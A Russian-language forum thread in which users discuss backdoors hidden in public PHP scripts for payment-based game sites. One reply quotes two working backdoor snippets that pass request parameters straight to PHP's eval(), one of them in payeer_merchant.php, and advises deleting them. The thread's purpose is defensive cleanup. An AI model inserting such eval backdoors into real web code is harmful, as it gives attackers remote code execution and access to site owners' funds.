Автор Тема: Стучалка (Прочитано 1707 раз)

Pasaton · « : 05 Мая 2017, 14:25:17 »

Ребята, расскажите пожалуйста, где наиболее часто (т.е. в каких файлах) написаны стучалки. А то собираюсь запустить проект, но надо сначала проверить на всевозможные дыры.

Какие дыры в этом скрипте есть? - https://yadi.sk/d/vLQTF2m43GiqQn

Joha · « **Ответ #1 :** 05 Мая 2017, 16:52:29 »

Не согласен с тобой

Добавлено сообщение: 05 Мая 2017, 16:57:31

Цитата: ford от 05 Мая 2017, 16:11:26

смешно :)
Никто за бесплатно чистить дырки паблика не станет, запомни это раз и навсегда.

Цитата: Joha от 05 Мая 2017, 16:52:29

Не согласен с тобой

Kuper · « **Ответ #2 :** 05 Мая 2017, 17:04:22 »

Цитата: Joha от 05 Мая 2017, 16:52:29

Не согласен с тобой
Добавлено сообщение: 05 Мая 2017, 16:57:31

Почистишь мне бесплатно?

Pasaton · « **Ответ #3 :** 05 Мая 2017, 17:09:53 »

Если не хотите помогать, то не пишите.

Joha · « **Ответ #4 :** 05 Мая 2017, 17:22:09 »

Я так не особо понимаю, но чаще всего дыры бывают в файле payeer_merchant.php там если есть строка

Код: [Выделить]

   # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
   
   eval($_GET['fs']);

если они есть, просто удали их, а ещё если там есть топ 5-10 тоже могут быть дыры, может не только в топе но все же вот код

Код: [Выделить]

f(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}

если я не прав, не надо смеяться пожалуйста

shans5 · « **Ответ #5 :** 05 Мая 2017, 18:38:26 »

Все правильно.... так же в модуле пожертвований пабличном есть дырка

Добавлено сообщение: 05 Мая 2017, 18:40:53

Цитата: ford от 05 Мая 2017, 16:11:26

смешно :)
Никто за бесплатно чистить дырки паблика не станет, запомни это раз и навсегда.

Я не супер специалист.... и НЕ ХВАЛЮСЬ...
Но скрипты проверяю бесплатно... Если пользователь адекватный и по нормальному общается .

Shop-53 · « **Ответ #6 :** 05 Мая 2017, 18:46:41 »

друзя хочу предупредить что \classes\_class.rfs_payeer.php есть один код через которий сливают бабки осторожно проверяйте ето не про силку от автора а именно кошель паер и вывод туда пример не покажу для безопасносты еслы что пишите помогу на счет скрипта я ничиво плохого ненашол в программе есть список увязимостей которие могут бить в игре смотрите

Программа

maks161 · « **Ответ #7 :** 05 Мая 2017, 21:17:58 »

дырявый однозначно проверил. а где и какие дыры это уже сам смотри ручками каждый файл а не прогами которые только половину видят.

Добавлено сообщение: 05 Мая 2017, 21:22:09

Цитата: Shop-53 от 05 Мая 2017, 18:46:41

друзя хочу предупредить что \classes\_class.rfs_payeer.php есть один код через которий сливают бабки осторожно проверяйте ето не про силку от автора а именно кошель паер и вывод туда пример не покажу для безопасносты еслы что пишите помогу на счет скрипта я ничиво плохого ненашол в программе есть список увязимостей которие могут бить в игре смотрите
Программа

я знаю этот код.

Shop-53 · « **Ответ #8 :** 05 Мая 2017, 22:04:36 »

Что ти знаеш какой код пример дай сюда или в лс

maks161 · « **Ответ #9 :** 05 Мая 2017, 22:15:11 »

Цитата: Shop-53 от 05 Мая 2017, 22:04:36

Что ти знаеш какой код пример дай сюда или в лс

ты хочешь чтоб я этот код выставил на всеобщее обозрение?

Pasaton · « **Ответ #10 :** 06 Мая 2017, 14:40:06 »

Хотя бы в лс написал..